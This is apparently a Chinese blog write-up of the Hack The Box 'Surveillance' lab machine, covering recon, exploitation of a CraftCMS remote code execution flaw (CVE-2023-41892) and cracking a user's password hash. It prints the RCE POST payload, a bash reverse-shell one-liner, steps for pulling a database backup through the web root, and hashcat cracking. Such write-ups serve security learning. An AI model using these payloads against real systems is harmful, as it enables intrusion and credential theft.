靶机:Surveillance (from Hack The Box)

 工具:Kali Linux

 目标:拿到user和root的一串32位hex字符串


## 配置hosts

  环境启动后,要设置一下hosts的映射关系,把IP与域名写入/etc/hosts里,不然无法打开环境。

 

## 信息搜集

  #1 打开站点进行了以下尝试:

    1)nmap扫描端口

    

    2)dirsearch扫描文件目录

    

  #2 发现目标仅开放22和80端口,存在admin目录,其它目录访问过后暂未发现用处。于是尝试访问http://surveillance.htb/admin。搜集到系统指纹信息,是一套CraftCMS系统。

    

    期间进行过密码爆破,但是没用,随后去网上搜一下看看有没有可用的nday。

## 漏洞利用,GetSHELL

    参考文章:CVE-2023-41892 CraftCMS远程代码命令执行漏洞利用分析。发现这套系统存在可利用的RCE,经过测试,相关漏洞存在:

    POST方式提交:action=conditions/render&configObject=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\GuzzleHttp\\Psr7\\FnStream","__construct()":[{"close":null}],"_fn_close":"phpinfo"}}

    

    在GitHub上也找到可以利用的脚本,于是利用前辈写好的exp直接打(exp链接)并拿到了shell。

 

  然后把shell反弹到自己机器上,不然容易断,也更容易进行操作:bash -c "bash -i >& /dev/tcp/xxxx/12345 0>&1"。

## 后渗透---信息搜集

  因为我们拿到的shell还不是user或者root,只是一个www-data,所以现在要寻找能拿到user有关的信息。

    1)访问/etc/passwd,发现有俩可能是我们要用到的:matthew和zoneminder

    2)逛一圈儿网站目录文件,发现/var/www/html/craft/storage/backups路径下有一个sql备份包

    肯定是想要尝试下下来看一下,所以我把这个包复制到/var/www/html/craft/web下并改名为1.zip,这样就可以直接访问http://surveillance.htb/1.zip获得这个压缩包了。打开之后搜索matthew就找到了和其相关的内容:

    这是一条sql插入语句,通过表users和相应字段,可以大致判断这一条语句内的信息就是关于我们所要找的user,其中有一串疑似密码的东西(39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec),但具体是什么加密类型我们不知道,查阅资料可以利用hash-identifier(kali自带)来查询:

    看样子应该是SHA-256,但是咋解???查询资料,尝试用hashcat来进行爆破,-m 1400 表示进行SHA-256类型爆破,把那串密文保存到一个文档中(我的是code.txt)并结合kali自带的字典/usr/share/wordlists/rockyou.txt(我的需要先从rockyou.txt.gz解压出来才能用)。因为之前解过了,后面加上--show参数看解的密码。

 ## 拿到user-matthew的flag

  我们拿到了用户名:matthew和密码starcraft122490,那么直接ssh进行连接,拿到用户matthew的shell

  至此,拿到user的flag


root权限的获得还在研究中~

[渗透测试] HTB_Surveillance WriteUp [上]的更多相关文章

  1. xss之渗透测试

    跨站脚本攻击:cross site script execution(通常简写为xss,因css与层叠样式表同名,故改为xss),是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用 ...

  2. Kali Linux Web 渗透测试视频教程—第十一课-扫描、sql注入、上传绕过

    Kali Linux Web 渗透测试视频教程—第十一课-扫描.sql注入.上传绕过 文/玄魂 原文链接:http://www.xuanhun521.com/Blog/2014/10/25/kali- ...

  3. 使用XAMPP和DVWA在Windows7上搭建渗透测试环境

    前言: XAMPP是一个Web应用程序运行环境集成软件包,包括MySQL.PHP.PerI和Apache的环境及Apache.MySQL.FilleZilla.Mercury和Tomecat等组件.D ...

  4. 使用WampServer和DVWA在Windows10上搭建渗透测试环境

    前言: DVWA是一个具有脆弱性的Web测试应用,需要PHP和MySQL的环境支持.我们可以手动配置DVWA所需的运行环境,也可以使用WampServer进行搭建.WampServer是集成了Apac ...

  5. Burpsuite常用模块详解以及渗透测试上的运用

    0x00前言 哪有什么前言,大家好,我是浅安.QQ:320229344... 0x01 JDK的安装,以及Burpsuite的成功开启. burpsuite基于JAVA环境才能正常运行的.所以要先安装 ...

  6. 远程桌面(RDP)上的渗透测试技巧和防御

      0x00 前言 在本文中,我们将讨论四种情况下的远程桌面渗透测试技巧方法.通过这种攻击方式,我们试图获取攻击者如何在不同情况下攻击目标系统,以及管理员在激活RDP服务时来抵御攻击时应采取哪些主要的 ...

  7. 小白日记20:kali渗透测试之后渗透测试阶段(一)--上传工具

    后渗透测试阶段--上传工具 为防止管理员将漏洞补上后,我们无法再通过该漏洞控制对方主机,所以需要进行后渗透测试阶段 1.上传各种工具 2.提权:为了全面控制目标系统 3.擦除攻击痕迹:防止管理员通过日 ...

  8. 【10.21总结】一个渗透测试练习实例——发现未知的漏洞(Race condition)

    Write-up地址:Exploiting an unknown vulnerability 作者:Abhishek Bundela 这篇文章跟我之前看到的文章不太一样,作者是按照一个练习的方式简单描 ...

  9. github渗透测试工具库

    本文作者:Yunying 原文链接:https://www.cnblogs.com/BOHB-yunying/p/11856178.html 导航: 2.漏洞练习平台 WebGoat漏洞练习平台: h ...

  10. github渗透测试工具库[转载]

    前言 今天看到一个博客里有这个置顶的工具清单,但是发现这些都是很早以前就有文章发出来的,我爬下来后一直放在txt里吃土.这里一起放出来. 漏洞练习平台 WebGoat漏洞练习平台:https://gi ...

随机推荐

  1. 深入理解 Java 变量类型、声明及应用

    Java 变量 变量是用于存储数据值的容器.在 Java 中,有不同类型的变量,例如: String - 存储文本,例如 "你好".字符串值用双引号引起来. int - 存储整数( ...

  2. 从零开始学Spring Boot系列-SpringApplication

    SpringApplication类提供了一种从main()方法启动Spring应用的便捷方式.在很多情况下, 你只需委托给 SpringApplication.run这个静态方法 : @Spring ...

  3. Makefile编写模板 & 学习笔记

    一.模板 # 伪命令 .PHONY: clean compileSo compileExe run: compileExe @./main compileExe: compileSo @g++ mai ...

  4. Centos环境部署SpringBoot项目

    centos JDK Jenkins maven tomcat git myslq nginx 7.9 11.0.19 2.418 3.8.1 9.0.78 2.34.4 5.7.26 1.24.0 ...

  5. openGauss数据库源码解析——慢SQL检测

    openGauss 数据库源码解析--慢 SQL 检测 慢 SQL 检测的定义: 基于历史 SQL 语句信息进行模型训练,并用训练好的模型进行 SQL 语句的预测,利用预测结果判断该 SQL 语句是否 ...

  6. sql 语句系列(删库跑路系列)[八百章之第七章]

    前言 最开心的章节,没有之一. 删除违反参照完整性的记录 EMP 是员工表,DEPT 是部门表 DEPTNO是部门编号 delete from EMP where not exists ( selec ...

  7. vue截取video视频中的某一帧

    在vue中如何做到给视频拍照,留住那一帧的美好呢? 且看代码 <template> <div> <video src="../assets/video.mp4& ...

  8. Vue 路由组件传参的 8 种方式

    我们在开发单页面应用时,有时需要进入某个路由后基于参数从服务器获取数据,那么我们首先要获取路由传递过来的参数,从而完成服务器请求,所以,我们需要了解路由传参的几种方式,以下方式同 vue-router ...

  9. flask通过线程池实现异步

    from flask import Flask from time import sleep from concurrent.futures import ThreadPoolExecutor # D ...

  10. 三款免费强大的SSH工具食用指南

    食用清单 XShell FinalShell Electerm 食用方案 XShell 先说说老牌ssh工具XShell吧,用过很多年,说实话没啥别的毛病挺好用的.不过,还是有些地方有待加强,比如文件 ...